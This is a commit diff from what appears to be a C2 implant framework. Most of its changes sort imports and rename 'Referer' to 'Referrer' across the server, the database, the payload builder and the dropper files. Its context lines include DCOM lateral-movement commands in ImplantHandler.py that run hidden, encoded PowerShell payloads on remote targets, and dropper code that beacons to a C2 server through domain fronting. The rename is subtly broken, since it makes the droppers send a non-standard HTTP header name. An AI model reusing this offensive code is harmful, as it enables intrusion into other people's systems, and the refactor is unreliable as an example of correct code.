Imports sorted

C2Server.py

@@ -1,17 +1,21 @@
 #!/usr/bin/env python
 
-import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal
+import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal, ssl
 
-from Implant import *
-from Tasks import *
-from Core import *
-from Colours import *
-from Help import *
-from DB import *
-from Payloads import *
-from Config import *
-from Cert import *
-from Help import *
+from Implant import Implant 
+from Tasks import newTask
+from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip
+from Colours import Colours
+from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all
+from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey
+from Payloads import Payloads
+from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP
+from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
+from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
+from Config import APIUser, EnableNotifications
+from Cert import create_self_signed_cert
+from Help import logopic
+from Utils import validate_sleep_time, randomuri, gen_key
 
 class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 
@@ -429,7 +433,7 @@ if __name__ == '__main__':
         print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
         print(Colours.GREEN)
         sys.exit(1)
-      setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications)
+      setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications)
       rewriteFile = "%s/rewrite-rules.txt" % directory
       print "Creating Rewrite Rules in: " + rewriteFile
       print ""

Config.py

@@ -28,7 +28,7 @@ APIToken = ""
 APIUser = ""
 URLS = urlConfig.fetchUrls()
 SocksURLS = urlConfig.fetchSocks()
-Referer = "" # optional
+Referrer = "" # optional
 HTTPResponse = """<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <html><head>
 <title>404 Not Found</title>

DB.py

@@ -85,7 +85,7 @@ def initializedb():
         SocksURLS TEXT,
         Insecure TEXT,
         UserAgent TEXT,
-        Referer TEXT,
+        Referrer TEXT,
         APIToken TEXT,
         APIUser TEXT,
         EnableNotifications TEXT);"""
@@ -110,11 +110,11 @@ def initializedb():
   else:
     print("Error! cannot create the database connection.")
 
-def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications):
+def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications):
   conn = sqlite3.connect(Database)
   conn.text_factory = str
   c = conn.cursor()
-  c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications))
+  c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications))
   conn.commit()
 
 def get_c2server_all():

Files/dropper.cs

@@ -74,7 +74,7 @@ public class Program
 			x.Headers.Add("Host", df);
 
 		x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
-		x.Headers.Add("Referer", "#REPLACEREFERER#");
+		x.Headers.Add("Referrer", "#REPLACEREFERER#");
 
 		if (null != cookie)
 			x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");

Files/dropper.ps1

@@ -52,7 +52,7 @@ $h="#REPLACEDOMAINFRONT#"
 if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
 elseif($h){$script:s="https://$($h)#REPLACECONNECT#";$script:sc="https://$($h)"}
 $wc.Headers.Add("User-Agent","#REPLACEUSERAGENT#")
-$wc.Headers.Add("Referer","#REPLACEREFERER#")
+$wc.Headers.Add("Referrer","#REPLACEREFERER#")
 if ($proxyurl) {
 $wp = New-Object System.Net.WebProxy($proxyurl,$true);
 if ($username -and $password) {

ImplantHandler.py

@@ -2,18 +2,22 @@
  
 import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime
 from sqlite3 import Error
-from Help import *
-from AutoLoads import *
-from DB import *
-from Colours import *
-from Config import *
-from HTML import *
-from TabComplete import *
-from Payloads import *
-from Core import *
-from Alias import *
-from Opsec import *
-from Utils import validate_sleep_time
+from Help import logopic, COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6
+from Help import posh_help6, posh_help7, posh_help8, pre_help, PRECOMMANDS, py_help1, sharp_help1, UXCOMMANDS, SHARPCOMMANDS
+from AutoLoads import check_module_loaded, run_autoloads
+from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
+from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand
+from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
+from DB import  drop_newtasks, get_implanttype, update_label, update_sleep, get_history, kill_implant, unhide_implant
+from DB import get_pid, get_allurls, get_sharpurls, get_randomuri, get_hostdetails, select_item
+from Colours import Colours
+from Config import ROOTDIR, ModulesDirectory, PayloadsDirectory, POSHDIR
+from HTML import generate_table, graphviz
+from TabComplete import tabCompleter
+from Payloads import Payloads
+from Alias import py_alias, ps_alias, cs_alias
+from Opsec import ps_opsec
+from Utils import validate_sleep_time, gen_key, randomuri
 
 def catch_exit(signum, frame):
   sys.exit(0)
@@ -1018,7 +1022,7 @@ def runcommand(command, randomuri):
         with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
         params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
         params = params.sub("", command)
-        p = re.compile(ur'(?<=-target.).*')
+        p = re.compile(r'(?<=-target.).*')
         target = re.search(p, command).group()
         pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
         new_task(pscommand, user, randomuri)
@@ -1029,7 +1033,7 @@ def runcommand(command, randomuri):
       daisyname = raw_input("Name required: ")
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
-        p = re.compile(ur'(?<=-target.).*')
+        p = re.compile(r'(?<=-target.).*')
         target = re.search(p, command).group()
         pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
         new_task(pscommand, user, randomuri)
@@ -1042,7 +1046,7 @@ def runcommand(command, randomuri):
           "", "", "", "", C2[19], C2[20],
           C2[21], get_newimplanturl(), PayloadsDirectory)
       payload = newPayload.CreateRawBase()
-      p = re.compile(ur'(?<=-target.).*')
+      p = re.compile(r'(?<=-target.).*')
       target = re.search(p, command).group()
       pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
       new_task(pscommand, user, randomuri)
@@ -1321,7 +1325,7 @@ def commandloop(implant_id, user):
     except Exception as e:
       print (Colours.RED)
       print ("Error running against the selected implant ID, ensure you have typed the correct information")
-      print Colours.END
+      print (Colours.END)
       #traceback.print_exc()
       #print "Error: %s" % e
       # remove the following comment when publishing to live

Modules/Invoke-DaisyChain.ps1

@@ -64,7 +64,7 @@ function Get-Webclient (`$Cookie) {
 `$proxyurl = `$proxyurl
 `$wc = New-Object System.Net.WebClient;  
 `$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko")
-`$wc.Headers.Add("Referer","")
+`$wc.Headers.Add("Referrer","")
 `$h=`$domainfrontheader
 if (`$h) {`$wc.Headers.Add("Host",`$h)}
 if (`$proxyurl) {

Payloads.py

@@ -10,7 +10,7 @@ class Payloads(object):
   quickstart = None
 
   def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
-    Insecure, UserAgent, Referer, ConnectURL, BaseDirectory):
+    Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory):
     self.KillDate = KillDate
     self.Key = Key
     self.DomainFrontHeader = Domainfrontheader
@@ -23,7 +23,7 @@ class Payloads(object):
     self.ImplantType = ImplantType
     self.Insecure = Insecure
     self.UserAgent = UserAgent
-    self.Referer = Referer
+    self.Referrer = Referrer
     self.ConnectURL = ConnectURL
     self.BaseDirectory = BaseDirectory
     self.C2Core = ""
@@ -72,7 +72,7 @@ class Payloads(object):
     cs8 = cs7.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader)
     cs9 = cs8.replace("#REPLACECONNECT#",self.ConnectURL)
     cs10 = cs9.replace("#REPLACEUSERAGENT#",self.UserAgent)
-    cs11 = cs10.replace("#REPLACEREFERER#",self.Referer)
+    cs11 = cs10.replace("#REPLACEREFERER#",self.Referrer)
     self.C2Core = cs11.replace("#REPLACEKEY#",self.Key)
      
   def QuickstartLog( self, txt ):
@@ -179,7 +179,7 @@ class Payloads(object):
     cs3 = cs2.replace("#REPLACEKILLDATE#",self.KillDate)
     cs4 = cs3.replace("#REPLACEDF#",self.DomainFrontHeader)
     cs5 = cs4.replace("#REPLACEUSERAGENT#",self.UserAgent)
-    cs6 = cs5.replace("#REPLACEREFERER#",self.Referer)
+    cs6 = cs5.replace("#REPLACEREFERER#",self.Referrer)
     cs7 = cs6.replace("#REPLACEPROXYURL#",self.Proxyurl)
     cs8 = cs7.replace("#REPLACEPROXYUSER#",self.Proxyuser)
     cs9 = cs8.replace("#REPLACEPROXYPASSWORD#",self.Proxypass)